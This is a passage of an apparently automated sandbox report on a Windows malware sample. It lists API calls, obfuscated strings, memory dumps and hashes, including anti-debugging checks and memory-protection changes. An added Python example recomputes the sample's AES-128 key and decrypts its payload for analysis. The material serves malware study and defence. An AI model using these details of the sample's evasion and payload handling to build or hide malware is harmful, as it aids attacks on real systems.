                        • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                        • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                        • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
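This entry and the one before it describe the same routine, once in the original image at 00403650 and once relocated into the 04950000 region: CryptAcquireContextW asks for provider type 0x18 (PROV_RSA_AES) with flag 0xF0000000 (CRYPT_VERIFYCONTEXT), CryptCreateHash uses ALG_ID 0x800C (CALG_SHA_256), CryptDeriveKey asks for 0x660E (CALG_AES_128), and CryptDecrypt is called with hHash = 0, Final = FALSE and dwFlags = 0 without any CryptSetKeyParam call in between. The Python below is an added editor's example, not code from the report or from the sample: it reproduces the documented CryptDeriveKey algorithm so that the payload key can be recomputed offline once the hashed input is known, and it covers the non-SHA-2 expansion path as well, which this sample does not use. The buffer passed to CryptHashData is shown only as "?" in the listing, so the passphrase in the usage line is a constructed placeholder. The decrypt helper relies on CryptoAPI's documented defaults for a freshly derived block-cipher key (CBC mode, all-zero IV) and on pycryptodome being installed.

```python
import hashlib

# ALG_ID values from wincrypt.h; 0x800C and 0x660E are the arguments seen in the
# report's CryptCreateHash and CryptDeriveKey calls.
CALG_MD5, CALG_SHA1 = 0x8003, 0x8004
CALG_SHA_256, CALG_SHA_384, CALG_SHA_512 = 0x800C, 0x800D, 0x800E
CALG_3DES = 0x6603
CALG_AES_128, CALG_AES_192, CALG_AES_256 = 0x660E, 0x660F, 0x6610

HASH_NAMES = {CALG_MD5: "md5", CALG_SHA1: "sha1", CALG_SHA_256: "sha256",
              CALG_SHA_384: "sha384", CALG_SHA_512: "sha512"}
KEY_LENGTHS = {CALG_3DES: 24, CALG_AES_128: 16, CALG_AES_192: 24, CALG_AES_256: 32}
SHA2_FAMILY = {CALG_SHA_256, CALG_SHA_384, CALG_SHA_512}


def crypt_derive_key(hash_alg: int, key_alg: int, base_data: bytes) -> bytes:
    """Reproduce CryptDeriveKey(hProv, key_alg, hHash, 0, &hKey) for a hash object that
    received base_data through a single CryptHashData call.

    Documented behaviour: the key is the first n bytes of the finished hash, except that
    a non-SHA-2 hash combined with AES or 3DES is first expanded with the 0x36 / 0x5C
    pads (the same inner/outer pad construction HMAC uses) before truncation.
    """
    name = HASH_NAMES[hash_alg]
    n = KEY_LENGTHS[key_alg]
    digest = hashlib.new(name, base_data).digest()
    if hash_alg in SHA2_FAMILY:
        material = digest
    else:
        k = len(digest)
        inner = bytes(b ^ 0x36 for b in digest) + bytes([0x36]) * (64 - k)
        outer = bytes(b ^ 0x5C for b in digest) + bytes([0x5C]) * (64 - k)
        material = hashlib.new(name, inner).digest() + hashlib.new(name, outer).digest()
    if n > len(material):
        raise ValueError(f"{name} cannot supply a {n}-byte key")
    return material[:n]


def derive_sample_key(hashed_input: bytes) -> bytes:
    """The exact combination in this report: SHA-256 hash object, AES-128 key."""
    return crypt_derive_key(CALG_SHA_256, CALG_AES_128, hashed_input)


def aes128_cbc_decrypt_like_cryptdecrypt(key: bytes, ciphertext: bytes) -> bytes:
    """Decrypt as CryptDecrypt(hKey, 0, FALSE, 0, buf, &len) does on a key whose
    parameters were never changed: CBC (KP_MODE default), zero IV (KP_IV default)
    and, because Final is FALSE, no padding removal. Requires pycryptodome; the
    import is lazy so the key-derivation part of this module runs without it."""
    from Crypto.Cipher import AES  # pycryptodome
    if len(ciphertext) % 16:
        raise ValueError("Final=FALSE decryption only processes whole 16-byte blocks")
    return AES.new(key, AES.MODE_CBC, iv=bytes(16)).decrypt(ciphertext)


if __name__ == "__main__":
    # Constructed placeholder; the real hashed buffer is not visible in the report.
    print(derive_sample_key(b"example-passphrase").hex())
```

Because SHA-256 yields 32 bytes and AES-128 needs 16, the sample's key is simply the first half of the SHA-256 digest of whatever it hashes; once that input is recovered from the dump, `aes128_cbc_decrypt_like_cryptdecrypt(derive_sample_key(data), blob)` reproduces the decryption the routine performs.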
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                        • LocalFree.KERNEL32(00000000), ref: 00402B62
                        • LocalFree.KERNEL32(?), ref: 00402B67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                        • String ID: %s: %s$Error protecting memory page
                        • API String ID: 839691724-1484484497
                        • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                        • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                        • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                        • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                        APIs
                          • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                          • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04955344
                        • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                        • __Init_thread_footer.LIBCMT ref: 04955652
                        • Sleep.KERNEL32(000007D0), ref: 049559BC
                        • Sleep.KERNEL32(000007D0), ref: 049559D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: @BAO$updateSW
                        • API String ID: 3554146954-956047173
                        • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                        • Instruction ID: cb50f06d884e9880f0ef62a95241579db65518dc8b806f430c65bdc54610dab4
                        • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                        • Instruction Fuzzy Hash: 953213B0D00254DBEB28DF24CC987ADBBB4AF40314F6542F9D8096B2A6D775AE84CF45
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: $"}o$+Uuo$/1]$IP?5$]d*D$l-:$ni$zz>
                        • API String ID: 0-3313172819
                        • Opcode ID: 94ae598debca9667c48e9d82285888671873edb2ae1d013e20654a0f3ce9c6ab
                        • Instruction ID: d48a93fd504ac1afe5a9e746768a5d01bb23ab430b84ffe0370f700ef0df9790
                        • Opcode Fuzzy Hash: 94ae598debca9667c48e9d82285888671873edb2ae1d013e20654a0f3ce9c6ab
                        • Instruction Fuzzy Hash: A2B259F3A082149FE3046E2DEC8567ABBD9EFD4720F1A863DEAC4C7744E93558018796
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                        • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                        • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                        • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: <E~$n$G$on}${:g~$=e$i=+
                        • API String ID: 0-1581083642
                        • Opcode ID: 369acf3da22c7666c3e2bf8cbb53c6908a3deffb1b645d2a02021bed22549266
                        • Instruction ID: beae00a562f48c514757c634c6a22f33a5a24c0287a0bf4d0a7c06c64e182fa4
                        • Opcode Fuzzy Hash: 369acf3da22c7666c3e2bf8cbb53c6908a3deffb1b645d2a02021bed22549266
                        • Instruction Fuzzy Hash: BFB2D5F3A0C200AFE3046E2DEC8577ABBE9EB94720F1A493DE6C5C7744E63558058697
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID: text
                        • API String ID: 3197321146-999008199
                        • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                        • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                        • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                        • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: W??r$n"gx$u9?U$H~$H~$ym?
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: !>o}$Z~*X$]d77$U6B$~mk
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: nyW$I_U$Rk+k$UD??
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: q?$,g{$`(\_$TRI
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                        • IsDebuggerPresent.KERNEL32 ref: 0040A662
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                        • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                        • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • String ID: .$GetProcAddress.$l
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: 3q$ltO
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: 3q$ltO
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04965990,?,?,00000008,?,?,0496C8F1,00000000), ref: 04965BC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • String ID: 0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • String ID: 0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: NTDL
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • String ID: 0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • String ID: 0
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: zcOo
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: b~4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • String ID: *4;
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1af11d416a89fb02a18e9b79d43073afecc6e4f5267925e612be5243a03cf2ed
                        • Instruction ID: 5d2e2f59ddcbbe3530ec86ce2cf4296c667cccf74c6bc9b778fe806799a92f54
                        • Opcode Fuzzy Hash: 1af11d416a89fb02a18e9b79d43073afecc6e4f5267925e612be5243a03cf2ed
                        • Instruction Fuzzy Hash: D361B7F39087149FE304AE29D885369FBE1EF94310F26893DDAC897384E6395845CB87
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a0a958fbd1bf155bfd71185c0b4243e2167b282684c165a6b26c8d8c8dcd8c4
                        • Instruction ID: e5e6c29f537754a40f396f923a898d9c0e18ccb9f126eca8b455101087a15886
                        • Opcode Fuzzy Hash: 2a0a958fbd1bf155bfd71185c0b4243e2167b282684c165a6b26c8d8c8dcd8c4
                        • Instruction Fuzzy Hash: 4F4129F3A083145BF314A97DEC85736B6C6DB94320F2B463CEA99D77C5E8396C058292
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ad99483222e12994c5e013d85722e7cb0245fe04c3142041656bafe3afa6e51
                        • Instruction ID: abf16350a714903734db6ffcd60811d5253a0de73562cad6af6afdb73a1cbb2c
                        • Opcode Fuzzy Hash: 6ad99483222e12994c5e013d85722e7cb0245fe04c3142041656bafe3afa6e51
                        • Instruction Fuzzy Hash: F54145B3B085048FE3086A6EEC6177AB6DEEBD8330F6A023EA559D33C4EC755C014285
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc7ece833c8f1fc0b53a9c1e96beb496050a3ebe75cd25d6aaddfd3e146bffcc
                        • Instruction ID: dc2dd5a368b4bda1f34d05ee807aae43895fadf7abf049ee120ec7781be52669
                        • Opcode Fuzzy Hash: bc7ece833c8f1fc0b53a9c1e96beb496050a3ebe75cd25d6aaddfd3e146bffcc
                        • Instruction Fuzzy Hash: 9C41A0B2A086009FE3106E28DC8572AF7E6EFA4350F2B493CD6C893244E63959518B87
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 31093a781ad63aed303cabcd308a4e0756b12fe3fa5f3aaf202d1ed763eb6600
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: D91127B720018247D655CA3ED4B42B6E79DEFC6329B3C477AD8858B77AD222B144D700
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 08771eb7056d114c5da39982fe0a0733143f4f69ed40c61d8a9fd9b91280a921
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: 8C1182723401009FD754DF65DC90FA673EAEBC9220B198156ED04CB315E675FC11C760
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction ID: cacfbc0c46e98c86a351d82b4132ac5c712cceccaeed7baca1d735253631f30a
                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction Fuzzy Hash: 3401A276A006049FDF21CF24C818BAA33E9EB86316F6544B5ED0A9B291E774B9458F90
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b4f1e442cb820e5bf7a10184b81529133126d016388fb056b3004b24611545f
                        • Instruction ID: 4282d8ab57689e6923b05700e77f19250f14946f8aadc882be9c5bf80440b33a
                        • Opcode Fuzzy Hash: 2b4f1e442cb820e5bf7a10184b81529133126d016388fb056b3004b24611545f
                        • Instruction Fuzzy Hash: BAD02211A7D3C3AAD343E734CC984A1BFA0BC5B34839801EE80808F487EB1B6025DBD1
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
